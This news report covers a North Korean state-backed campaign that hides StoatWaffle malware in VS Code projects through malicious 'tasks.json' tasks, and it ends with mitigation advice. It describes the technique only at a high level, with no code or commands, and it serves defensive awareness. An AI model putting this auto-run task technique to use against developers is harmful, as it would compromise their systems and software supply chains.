A North Korean state-sponsored hacking group has been observed using a novel method to distribute malware, leveraging the trusted development environment of Microsoft’s Visual Studio Code. Security researchers have attributed a new campaign, active since December 2025, to the threat actor known as WaterPlum, which is also tracked under the name Contagious Interview.
The group is deploying a malicious software family called StoatWaffle by hiding it within corrupted VS Code projects. Their primary infection vector is the abuse of the integrated development environment’s (IDE) “tasks.json” configuration file, which is designed to automate common development processes.
Technical Details of the Attack
In this campaign, attackers create or compromise legitimate-seeming software projects. Within these projects, they embed malicious instructions in the “tasks.json” file. This file is part of VS Code’s task automation system, which developers use to run scripts, build tools, or start applications directly from the editor.
When an unsuspecting developer opens the project and runs the predefined task, often believing it to be a harmless build step, the malicious code executes automatically. This technique allows the StoatWaffle malware to be installed on the developer’s system without requiring any additional user interaction beyond a routine development action.
Attribution and Actor Profile
The activity has been confidently linked to the WaterPlum group, a cyber-espionage unit operating on behalf of North Korea. This actor, also referenced in security circles as Contagious Interview, has a history of conducting sophisticated attacks targeting government entities, research institutions, and technology firms worldwide.
Their focus typically involves intelligence gathering, intellectual property theft, and financial theft to support the regime. The shift to exploiting developer tools represents an evolution in their tactics, seeking to infiltrate organizations through their software supply chains or IT departments.
Significance of the VS Code Vector
The use of Microsoft Visual Studio Code as an attack platform is significant due to its immense popularity. VS Code is one of the world’s most widely used source-code editors, trusted by millions of developers across industries. By subverting a core feature meant for productivity, the hackers gain a high level of camouflage.
Security analysts note that this method bypasses many traditional security warnings because the action originates from a trusted, whitelisted application performing a seemingly legitimate function. This attack demonstrates a growing trend where threat actors increasingly target the tools and platforms used by software creators themselves.
Mitigation and Security Recommendations
Organizations and individual developers are advised to exercise heightened caution when opening VS Code projects from unverified or unknown sources. Security teams recommend scrutinizing the contents of configuration files like “tasks.json” before executing any automated tasks, especially those downloaded from the internet or received via email.
Maintaining updated antivirus and endpoint detection software remains crucial. Furthermore, developers should run development environments with the minimum necessary system permissions to limit the potential damage from such an intrusion. Official guidance from Microsoft regarding VS Code security best practices is expected to be updated in response to this threat.
Forward-Looking Analysis
Security researchers anticipate that other advanced persistent threat (APT) groups may adopt similar techniques, leading to a wider exploitation of trust in developer ecosystems. The cybersecurity community is actively analyzing the StoatWaffle malware’s full capabilities to understand its data exfiltration methods and command-and-control infrastructure.
Formal advisories from national cybersecurity agencies, including the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and South Korea’s National Intelligence Service, are likely to be issued in the coming weeks. These will provide detailed indicators of compromise and further defensive strategies for at-risk sectors.
Source: Adapted from multiple cybersecurity research reports
